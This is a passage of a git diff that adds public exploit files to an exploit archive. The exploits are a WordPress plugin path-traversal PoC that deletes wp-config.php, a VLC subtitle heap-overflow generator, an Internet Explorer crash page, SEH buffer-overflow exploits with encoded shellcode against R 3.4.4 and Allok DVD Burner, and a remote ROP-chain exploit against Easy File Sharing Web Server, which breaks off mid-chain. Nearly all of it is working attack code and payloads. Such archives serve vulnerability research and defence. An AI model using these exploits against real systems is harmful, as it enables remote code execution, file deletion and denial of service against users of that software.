+         - $_POST['file_name'] is not escaped.
+
+Article:
+*http://lenonleite.com.br/en/publish-exploits/english-plugin-woo-import-export-1-0-rce-unlink/
+
+Video:
+
+*https://www.youtube.com/watch?v=pImtGeecdCk
+
+2. Proof of Concept
+-->
+
+<form method="post"
+action="http://server/wp-admin/admin-ajax.php?action=wpie_remove_export_entry">
+   <input type="text" name="file_name" value="../../../wp-config.php">
+   <input type="text" name="log_id" value="aaa">
+   <input type="submit">
+</form>
+
+<!--
+   - Date Discovery : *11/25/2017*
+      - Date Vendor Contact : *12/29/2017*
+      - Date Publish : 24/04/2018
+      - Date Resolution :
+-->
\ No newline at end of file
diff --git a/exploits/windows/dos/44514.py b/exploits/windows/dos/44514.py
new file mode 100755
index 000000000..a17d1d68b
--- /dev/null
+++ b/exploits/windows/dos/44514.py
@@ -0,0 +1,62 @@
+"""
+VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
+Author: SivertPL (kroppoloe@protonmail.ch)
+CVE: CVE-2017-8311
+
+Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
+This is the Proof of Concept of the reverse engineered heap corruption vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime.
+The crash is exploitable, but hard to exploit because of various environmental constraints such as threading/mitigations/scriptless.
+I want to join a research team.
+"""
+
+"""
+ModLoad: 00000000`71660000 00000000`716a2000   C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
+ModLoad: 00000000`71630000 00000000`71651000   C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
+ModLoad: 00000000`71610000 00000000`7162e000   C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
+ModLoad: 00000000`71600000 00000000`7160d000   C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
+ModLoad: 00000000`715e0000 00000000`715fd000   C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
+ModLoad: 00000000`715d0000 00000000`715de000   C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
+ModLoad: 00000000`715b0000 00000000`715cf000   C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll
+core demux error: option sub-original-fps does not exist
+(33c.d10): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll -
+libsubtitle_plugin+0x44de:
+715b44de 881f            mov     byte ptr [edi],bl          ds:002b:1b9fb000=??
+0:012:x86> g
+(33c.d10): Access violation - code c0000005 (!!! second chance !!!)
+wow64!Wow64NotifyDebugger+0x1d:
+00000000`754ac9f1 654c8b1c2530000000 mov   r11,qword ptr gs:[30h] gs:00000000`00000030=????????????????
+"""
+
+import os
+import struct
+import sys
+import argparse
+
+len = 1025
+
+def main(argv):
+    parser = argparse.ArgumentParser()
+    parser.add_argument("filename", help="Name of the movie file w/o extension, for generating payload")
+    parser.add_argument("--length", help="Heap overwrite length (default 1025, may be bigger)", type=int)
+    args = parser.parse_args()
+    if args.length:
+        global len
+        len = args.length
+    print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, len)
+    write(args.filename, len)
+
+def write(name, len):
+    subtitles = open("%s.jss" % name, "w+")
+    subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
+    subtitles.write("0:00:04.00 0:00:05.00 vm attack")
+    subtitles.write("\\C")
+    subtitles.write(struct.pack('B', 0))
+    subtitles.write('A' * len)
+    subtitles.close()
+    print "[+] Done!"
+
+if __name__ == "__main__":
+     main(sys.argv[1:])
\ No newline at end of file
diff --git a/exploits/windows/dos/44525.py b/exploits/windows/dos/44525.py
new file mode 100755
index 000000000..0c74f5237
--- /dev/null
+++ b/exploits/windows/dos/44525.py
@@ -0,0 +1,156 @@
+'''
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt
+[+] ISR: ApparitionSec         
+
+
+Vendor:
+=======
+www.microsoft.com
+
+
+Product:
+========
+Internet Explorer (Windows 10)
+v11.371.16299.0
+
+Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.
+
+
+Vulnerability Type:
+==================
+Denial Of Service
+
+
+CVE Reference:
+==============
+N/A
+
+
+Security Issue:
+================
+A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted
+HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself,
+if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the
+crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end users MSIE browser.
+
+Referencing some of the following extensions .exe:, .com:, .pif:, .bat: and .scr: should produce the same :)
+
+Tested Windows 10 
+
+Stack Dump:
+==========
+(2e8c.27e4): Access violation - code c0000005 (first/second chance not available)
+ntdll!NtWaitForMultipleObjects+0x14:
+00007ffa`be5f0e14 c3              ret
+0:015> r
+rax=000000000000005b rbx=0000000000000003 rcx=0000000000000003
+rdx=000000cca6efd3a8 rsi=0000000000000000 rdi=0000000000000003
+rip=00007ffabe5f0e14 rsp=000000cca6efcfa8 rbp=0000000000000000
+ r8=0000000000000000  r9=0000000000000000 r10=0000000000000000
+r11=0000000000000246 r12=0000000000000010 r13=000000cca6efd3a8
+r14=0000000000000000 r15=0000000000000000
+iopl=0         nv up ei pl zr na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
+ntdll!NtWaitForMultipleObjects+0x14:
+00007ffa`be5f0e14 c3              ret
+
+CONTEXT:  (.ecxr)
+rax=0000000000000000 rbx=000001fd4a2ec9d8 rcx=0000000000000000
+rdx=00007ffabb499398 rsi=000001fd4a5b0ce0 rdi=0000000000000000
+rip=00007ffabb7fc646 rsp=000000cca6efe4f8 rbp=000000cca6efe600
+ r8=0000000000000000  r9=0000000000008000 r10=00007ffabb499398
+r11=0000000000000000 r12=0000000000000000 r13=00007ffabb48d060
+r14=0000000000000002 r15=0000000000000001
+iopl=0         nv up ei pl zr na po nc
+cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+KERNELBASE!StrCmpICW+0x6:
+00007ffa`bb7fc646 450fb70b        movzx   r9d,word ptr [r11] ds:00000000`00000000=????
+Resetting default scope
+
+FAULTING_IP: 
+KERNELBASE!StrCmpICW+6
+00007ffa`bb7fc646 450fb70b        movzx   r9d,word ptr [r11]
+
+EXCEPTION_RECORD:  (.exr -1)
+ExceptionAddress: 00007ffabb7fc646 (KERNELBASE!StrCmpICW+0x0000000000000006)
+   ExceptionCode: c0000005 (Access violation)
+  ExceptionFlags: 00000000
+NumberParameters: 2
+   Parameter[0]: 0000000000000000
+   Parameter[1]: 0000000000000000
+Attempt to read from address 0000000000000000
+
+DEFAULT_BUCKET_ID:  NULL_POINTER_READ
+PROCESS_NAME:  iexplore.exe
+
+
+
+POC video URL:
+==============
+https://vimeo.com/265691256/
+
+
+
+Exploit/POC:
+============
+1) Run below python script to create "IE-Win10-Crasha.html"
+2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10
+'''
+
+payload=('<br>\n'+
+'<center>MSIE v11.371.16299 Denial Of Service by hyp3rlinx <br>\n'+
+'<a href=".cmd:" id="hate">crashy ware shee</a>\n'+
+'<br>\n'+
+'Tested successfully on Windows 10\n'+
+'</center><script>\n'
+'function doit(){\n'+
+'document.getElementById("hate").click();\n'
+'alert("DOH!");\n'+
+'obj.click();\n'+
+'obj.click();\n'+
+'}\n'+
+'setInterval("doit()", 2000)\n'+
+'</script>')
+
+file=open("IE-Win10-Crasha.html","w")
+file.write(payload)
+file.close()
+
+print 'MS InternetExplorer (Win 10) '
+print 'Denial Of Service File Created.'
+print 'hyp3rlinx'
+
+
+'''
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: April 18, 2018
+vendor closes thread : April 19, 2018
+April 20, 2018 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx
+'''
\ No newline at end of file
diff --git a/exploits/windows/local/44516.py b/exploits/windows/local/44516.py
new file mode 100755
index 000000000..7c6126964
--- /dev/null
+++ b/exploits/windows/local/44516.py
@@ -0,0 +1,83 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# CVE: CVE-2018-9060
+# Twitter: @bzyo_
+# Exploit Title: R 3.4.4 - Local Buffer Overflow
+# Date: 03-27-2018
+# Vulnerable Software: R 3.4.4
+# Vendor Homepage: https://www.r-project.org/
+# Version: 3.4.4
+# Software Link: https://cloud.r-project.org/bin/windows/
+# Tested On: Windows 7 x86
+#
+# Timeline:
+# 03-27-18: Emailed author, no response
+# 04-03-18: Emailed author, no response
+# 04-10-18: Emailed author, no response
+# 04-23-18: New version released; Submitted public disclosure
+#
+# lots of bad chars, use alpha_mixed
+# badchars \x00\x0a\x0d\x0e and \x80 through \xbf
+#
+#
+# PoC: 
+# 1. generate r344.txt, copy contents to clipboard
+# 2. open app, select Edit, select 'GUI preferences'
+# 3. paste r344.txt contents into 'Language for menus and messages'
+# 4. select OK
+# 5. pop calc
+#
+
+
+filename="r344.txt"
+
+junk = "A"*900
+
+#jump 6
+nseh = "\xeb\x06\xcc\xcc"
+
+#0x643c17af : pop esi # pop edi # ret  |  {PAGE_EXECUTE_READ} [Riconv.dll]
+seh = "\xaf\x17\x3c\x64"
+
+#msfvenom -a x86 -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d\x0e" -e x86/alpha_mixed -f c
+#Payload size: 448 bytes
+calc = ("\x89\xe1\xd9\xf7\xd9\x71\xf4\x5b\x53\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x59\x6c\x5a\x48\x4c\x42\x77\x70\x53\x30\x45\x50\x35\x30\x6b"
+"\x39\x58\x65\x70\x31\x39\x50\x30\x64\x4c\x4b\x50\x50\x64\x70"
+"\x6e\x6b\x71\x42\x34\x4c\x4e\x6b\x71\x42\x37\x64\x6e\x6b\x62"
+"\x52\x56\x48\x36\x6f\x4c\x77\x61\x5a\x64\x66\x56\x51\x49\x6f"
+"\x6e\x4c\x45\x6c\x75\x31\x71\x6c\x53\x32\x66\x4c\x55\x70\x69"
+"\x51\x38\x4f\x44\x4d\x47\x71\x6a\x67\x78\x62\x6a\x52\x31\x42"
+"\x76\x37\x4e\x6b\x70\x52\x44\x50\x6e\x6b\x61\x5a\x47\x4c\x6c"
+"\x4b\x30\x4c\x34\x51\x71\x68\x4b\x53\x63\x78\x77\x71\x4b\x61"
+"\x63\x61\x4e\x6b\x63\x69\x35\x70\x56\x61\x4e\x33\x6e\x6b\x57"
+"\x39\x65\x48\x68\x63\x44\x7a\x37\x39\x6c\x4b\x46\x54\x6c\x4b"
+"\x47\x71\x7a\x76\x35\x61\x49\x6f\x4c\x6c\x7a\x61\x6a\x6f\x64"
+"\x4d\x55\x51\x4b\x77\x57\x48\x6b\x50\x74\x35\x69\x66\x65\x53"
+"\x31\x6d\x4a\x58\x77\x4b\x61\x6d\x51\x34\x61\x65\x6a\x44\x61"
+"\x48\x4e\x6b\x62\x78\x45\x74\x47\x71\x79\x43\x71\x76\x4c\x4b"
+"\x64\x4c\x72\x6b\x6c\x4b\x73\x68\x35\x4c\x43\x31\x6a\x73\x6e"
+"\x6b\x37\x74\x6e\x6b\x37\x71\x4e\x30\x4f\x79\x52\x64\x35\x74"
+"\x55\x74\x71\x4b\x51\x4b\x51\x71\x70\x59\x72\x7a\x53\x61\x6b"
+"\x4f\x59\x70\x73\x6f\x63\x6f\x72\x7a\x4c\x4b\x56\x72\x48\x6b"
+"\x6e\x6d\x31\x4d\x50\x6a\x55\x51\x6e\x6d\x4b\x35\x4f\x42\x73"
+"\x30\x65\x50\x55\x50\x42\x70\x72\x48\x70\x31\x4e\x6b\x42\x4f"
+"\x6c\x47\x6b\x4f\x4a\x75\x4d\x6b\x5a\x50\x48\x35\x6e\x42\x31"
+"\x46\x62\x48\x39\x36\x5a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x79\x45"
+"\x45\x6c\x63\x36\x73\x4c\x45\x5a\x6b\x30\x59\x6b\x79\x70\x50"
+"\x75\x55\x55\x6d\x6b\x43\x77\x42\x33\x61\x62\x62\x4f\x33\x5a"
+"\x33\x30\x56\x33\x49\x6f\x49\x45\x43\x53\x53\x51\x72\x4c\x53"
+"\x53\x44\x6e\x65\x35\x64\x38\x43\x55\x67\x70\x41\x41")
+
+fill = "D"*8000
+
+buffer = junk + nseh + seh + calc + fill
+  
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
\ No newline at end of file
diff --git a/exploits/windows/local/44518.py b/exploits/windows/local/44518.py
new file mode 100755
index 000000000..635c6c26e
--- /dev/null
+++ b/exploits/windows/local/44518.py
@@ -0,0 +1,55 @@
+#######################################################
+# Exploit Title: Buffer Overflow(SEH)  on Allok Video to DVD Burner2.6.1217
+# Date: 23.04.2018
+# Exploit Author:T3jv1l
+# Vendor Homepage:http://www.alloksoft.com/
+# Software: www.alloksoft.com/allok_dvdburner.exe
+# Category:Local
+# Contact:https://twitter.com/T3jv1l
+# Version: Allok Video to DVD Burner 2.6.1217
+# Tested on: Windows 7 SP1 x86
+# Hello subinacls !
+# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
+#############################################################
+
+print"""
+#1.  Download and install the setup file
+#2.  Run this exploit code via python 2.7
+#3.  A file "Evil.txt" will be created
+#4.  Copy the contents of the file (Evil.txt)and paste in the License Name field 
+#5.  Click Register and BOMM !!!! """
+
+import struct
+
+file = open("Evil.txt","wb")
+buffer = 4000
+junk = "A" * 780
+nseh = "\x90\x90\xeb\x10"
+seh  = struct.pack("<L",0x10019A09)
+nop = "\x90" * 20
+
+# Shellcode Calc.exe
+
+buf = ""
+buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
+buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
+buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
+buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
+buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
+buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
+buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
+buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
+buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
+buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
+buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
+buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
+buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
+buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
+buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
+buf +="\xc4\xd9"
+exploit = junk + nseh + seh + nop + buf
+fillers = buffer - len(exploit)
+crush = exploit + "T" * fillers
+print "[+] Crush Me"
+file.write(crush)
+file.close()
\ No newline at end of file
diff --git a/exploits/windows/remote/44522.py b/exploits/windows/remote/44522.py
new file mode 100755
index 000000000..55bb966d7
--- /dev/null
+++ b/exploits/windows/remote/44522.py
@@ -0,0 +1,192 @@
+#!/usr/bin/env python
+#---------------------------------------------------------------------------------------------------#
+# Exploit Title   : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #
+# Date            : 04/24/2018                                                                      #
+# Exploit Author  : Hashim Jawad                                                                    #
+# Twitter         : @ihack4falafel                                                                  #
+# Author Website  : ihack4falafel[.]com                                                             #
+# Vendor Homepage : http://www.sharing-file.com/                                                    #
+# Software Link   : http://www.sharing-file.com/efssetup.exe                                        #
+# Original Exploit: https://www.exploit-db.com/exploits/44485/                                      #
+# Tested on       : Windows 7 Enterprise (x86) - Service Pack 1                                     # 
+#---------------------------------------------------------------------------------------------------#
+
+import requests
+import struct
+import time
+
+host='192.168.80.148'
+port='80'
+
+# badchars = "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
+# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
+# Payload size: 447 bytes
+
+shellcode =  ""
+shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
+shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
+shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
+shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
+shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
+shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
+shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
+shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
+shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
+shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
+shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
+shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
+shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
+shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
+shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
+shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
+shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
+shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
+shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
+shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
+shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
+shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
+shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
+shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
+shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
+shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
+shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
+shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
+shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
+shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
+shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
+shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
+shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
+shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
+shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
+shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
+shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
+shellcode += "\x70\x41\x41"
+
+# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]
+buffer  = '\x41' * (2647-128)                # filler to where ESP will point after stack pivot (see SEH gadget)
+
+# mona.py VirtualProtect() ROP template with few modifications 
+
+# ESI = ptr to VirtualProtect()
+buffer += struct.pack('<L', 0x10015442)      # POP EAX # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x61c832d0)      # ptr to &VirtualProtect() [IAT sqlite3.dll]
+buffer += struct.pack('<L', 0x1002248c)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x61c18d81)      # XCHG EAX,EDI # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x1001d626)      # XOR ESI,ESI # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x10021a3e)      # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
+
+# EBP = ReturnTo (ptr to jmp esp)
+buffer += struct.pack('<L', 0x1001add7)      # POP EBP # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x61c24169)      # & push esp # ret  [sqlite3.dll]
+
+# EDX = NewProtect (0x40)
+buffer += struct.pack('<L', 0x10022c4c)       # XOR EDX,EDX # RETN [ImageLoad.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
+buffer += struct.pack('<L', 0x61c059a0)       # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
